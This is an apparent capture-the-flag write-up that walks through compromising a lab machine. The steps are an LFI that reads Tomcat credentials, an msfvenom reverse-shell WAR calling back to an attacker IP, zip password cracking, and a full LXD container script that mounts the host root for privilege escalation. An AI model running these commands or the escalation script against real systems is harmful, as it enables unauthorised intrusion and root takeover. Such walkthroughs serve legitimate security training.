Port enumeration

Using nmap, I found 3 open ports, 22, 80 and 8080. 9577ce1fed167777ac3e12035b2a0853.png In the port 8080, I found a Tomcat instance. 37e16ec2b8960ac8f232c404fd01c040.png

Web enumeration

In the web page, I found a LFI vulnerability, 53e6e4c9d2f8cd0625eeb5f0ee52951b.png

LFI

Using this vulnerability, I can access to tomcat-users.xml and read the tomcat user password. 90e169f8c303ebc8c7c8de703895825d.png c67a0e622ded865e658455863044a903.png

Tomcat enumeration

Using these credentials, I can access the host manager. 6668d2f2af3984dace697a48c2ff3e07.png With this user, I can deploy aplications using .war files.

RCE

Using msfvenom, I created a malicious .war.

msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.16.10 lport=8001 -f war > shell.war

e7bfe7138b5c220298442350f99a3751.png Using this file, I create a aplication. 488d996818859aa11dda3a04dd76d5e0.png Now, I executed the shell. a8a24aa069b45a713fb229d9de58213f.png d1af20fed4c7dabaa51a2a872f98d78c.png

Tomcat user enumeration

Using this user, I found a backup file. ec7882498173198e2434367208875ad8.png I downloaded this file in my local machine. dc653e31f83f368dd17758f053208e76.png This zip file is protected with password. 0d793610584e44024c96f24016f8efbc.png

Password cracking

Using zip2john, I extracted the zip file hash. 14fd514ad7ace000a170cbe814316b16.png And cracked the password using john. 76813d2b53b6f51fcb3bf55ae2c21796.png Using this password, I can log as ash with ssh or su. 1c30020fddb74d9c84f2067c8a03abc6.png

Privilege escalation

I found that ash user is part of lxd user. 45a89d87335efd916696a138843ffe32.png Firt thing I need to do is import my machine $PATH, cause the local machine path is very limithed. a97acfc93cdbfad6cb6a71a6e7c51e3d.png Now, I just need to create a lxc container with an alpine image mounting the machine root in the container with security.privileged enabled (I used the following script for this).

#!/usr/bin/env bash

# ----------------------------------
# Authors: Marcelo Vazquez (S4vitar)
#    Victor Lasa      (vowkin)
# ----------------------------------

function helpPanel(){
  echo -e "\nUsage:"
  echo -e "\t[-f] Filename (.tar.gz alpine file)"
  echo -e "\t[-h] Show this help panel\n"
  exit 1
}

function createContainer(){
  lxc image import $filename --alias alpine && lxd init --auto
  echo -e "[*] Listing images...\n" && lxc image list
  lxc init alpine privesc -c security.privileged=true
  lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
  lxc start privesc
  lxc exec privesc sh
  cleanup
}

function cleanup(){
  echo -en "\n[*] Removing container..."
  lxc stop privesc && lxc delete privesc && lxc image delete alpine
  echo " [√]"
}

set -o nounset
set -o errexit

declare -i parameter_enable=0; while getopts ":f:h:" arg; do
  case $arg in
    f) filename=$OPTARG && let parameter_enable+=1;;
    h) helpPanel;;
  esac
done

if [ $parameter_enable -ne 1 ]; then
  helpPanel
else
  createContainer
fi

2d45c8f11091417618dff0c966b40e05.png